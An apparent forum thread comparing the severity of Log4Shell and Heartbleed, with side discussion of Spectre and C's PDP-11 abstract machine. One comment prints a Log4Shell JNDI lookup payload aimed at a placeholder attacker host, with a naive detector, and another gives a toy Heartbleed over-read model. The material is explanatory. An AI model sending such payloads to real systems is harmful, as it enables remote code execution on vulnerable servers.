It seems almost impossible to say if log4shell was bigger or more costly than Heartbleed or the Debian OpenSSL bug (there are probably still keys out there made with the damaged randomness). Log4shell is just in recent memory.
> It seems almost impossible to say if log4shell was bigger or more costly than Heartbleed or the Debian OpenSSL bug (there are probably still keys out there made with the damaged randomness). Log4shell is just in recent memory.
Seems pretty clear to me - Heartbleed (and all the other serious memory exploits) required a great deal of skill and a lot of luck to exploit, and in return you either get no remote execution at all, or only a very tiny chance of one.
In comparison, log4j is about as easy to exploit into an RCE as it is to use curl.
Log4j is a guaranteed remote-execution exploit just by filling in a user-facing form with the correct URL, while memory exploits are not guaranteed to result in an RCE and require more skill than simply typing into an input box or an email.
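To make the "as easy as curl" point concrete, here's a sketch of the payload shape and why a plain logging call was enough. This is illustrative Python, not real Log4j code, and `attacker.example` is a placeholder:

```python
# Sketch of the Log4Shell (CVE-2021-44228) attack surface; not real Log4j code.
# A vulnerable Log4j 2.x pattern-expands ${...} in anything it logs, so
# attacker-controlled input becomes a JNDI lookup against the attacker's server.

payload = "${jndi:ldap://attacker.example/a}"  # attacker.example is a placeholder

# The vulnerable app only has to do something as mundane as:
#     logger.info("User-Agent: " + request.headers["User-Agent"])
# and Log4j itself resolves the ${jndi:...} lookup in the logged string.

def looks_like_log4shell_probe(s: str) -> bool:
    """Naive check for the classic payload shape (real probes used many
    obfuscations, e.g. nested ${lower:...} lookups, that this misses)."""
    return "${jndi:" in s.lower()

print(looks_like_log4shell_probe(payload))              # True
print(looks_like_log4shell_probe("ordinary user input"))  # False
```

The point is that the attacker's side really is curl-grade: type the magic string into any field that gets logged.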
> Log4j is a guaranteed remote-execution exploit just by filling in a user-facing form with the correct URL
This is only true of systems that were running very outdated JVM versions... on newer ones (we're talking JDK releases from 2017-2018 that stopped trusting remote codebases by default - 8u121 for RMI, 8u191 for LDAP - not like last month), you would need to pull off a serialization exploit to indirectly get RCE, which is quite a bit harder than sending an HTTP request.
> Heartbleed (and all the other serious memory exploits) required a great deal of skill and a lot of luck to exploit, and in return you either don't get a remote execution, or you get a very tiny chance of a remote execution.
Heartbleed wasn't about RCE at all. It was about memory disclosure -- memory that contained secret signing keys. The fallout was that keys needed to be revoked and rotated.
Reading out memory and extracting the secret keys was actually pretty simple. There were multiple POCs available.
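A toy model of why the read-out was so simple (illustrative Python, not OpenSSL's actual C): the server trusted the attacker-supplied heartbeat length field and echoed back that many bytes, running past the real payload into adjacent heap memory:

```python
# Toy model of Heartbleed (CVE-2014-0160); not real OpenSSL code.
# Pretend this bytearray is the process heap: the 4-byte heartbeat
# payload happens to sit right next to key material.
heap = bytearray(b"ping" + b"---PRIVATE-KEY-BYTES---")
ACTUAL_PAYLOAD_LEN = 4

def heartbeat_reply(claimed_len: int) -> bytes:
    # The bug: echo back claimed_len bytes with no check that
    # claimed_len <= ACTUAL_PAYLOAD_LEN.
    return bytes(heap[:claimed_len])

print(heartbeat_reply(4))    # b'ping' -- an honest heartbeat
print(heartbeat_reply(20))   # payload plus 16 bytes of adjacent "memory"
```

In the real attack you just repeated oversized heartbeats and sifted the leaked 64 KB chunks for key material - no corrupted control flow, no luck required.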
"The root cause of the Spectre and Meltdown vulnerabilities was that processor architects were trying to build not just fast processors, but fast processors that expose the same abstract machine as a PDP-11. This is essential because it allows C programmers to continue in the belief that their language is close to the underlying hardware."
Just because an academic has an opinion does not make it fact. That quote reads like a blog post, and with its lack of citation it might as well be one. Yes, it sounds plausible, but still.
Let's assume it's true: your argument would be "Intel made a mistake, but since they would only have made that mistake when doing stuff that appeases C programmers (would they have?), it's actually because of C."
Now, I think this is a bit of a stretch.
ETA: or did you mean that it has to do with C for that reason? In which case, OK, I see what you mean.
Oh yea, if not for emulating the PDP-11, processor designers would have no interest in instruction-level parallelism.
This article is pretty funny actually:
> On a modern high-end core, the register rename engine is one of the largest consumers of die area and power. To make matters worse, it cannot be turned off or power gated while any instructions are running
Yea, let's just gate off the RAT. What's it for again?
Java exposes the same abstract machine as a PDP-11 too. The key "PDP-11" thing is that all memory is treated as equally accessible, rather than the reality - i.e. that some memory is in caches on certain cores only and can therefore be accessed more efficiently from those cores.
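One quick way to see that "all memory is equally accessible" is a fiction: sum the same 2-D array row-wise (consecutive addresses, cache-friendly) and column-wise (strided, cache-hostile). This is a sketch; the measured gap varies a lot by machine, and in Python interpreter overhead masks much of the effect that would be dramatic in C:

```python
import time

# Sum a 2-D array two ways; both touch exactly the same elements,
# only the order of memory accesses differs.
N = 1000
grid = [[1] * N for _ in range(N)]

def sum_rows():
    total = 0
    for row in grid:          # row-major: walks each row contiguously
        for x in row:
            total += x
    return total

def sum_cols():
    total = 0
    for j in range(N):        # column-major: strides across rows
        for i in range(N):
            total += grid[i][j]
    return total

t0 = time.perf_counter(); r = sum_rows(); t1 = time.perf_counter()
c = sum_cols(); t2 = time.perf_counter()
assert r == c == N * N        # same work, same answer...
print(f"rows: {t1 - t0:.3f}s  cols: {t2 - t1:.3f}s")  # ...different cost
```

The abstract machine says these are equivalent; the cache hierarchy disagrees.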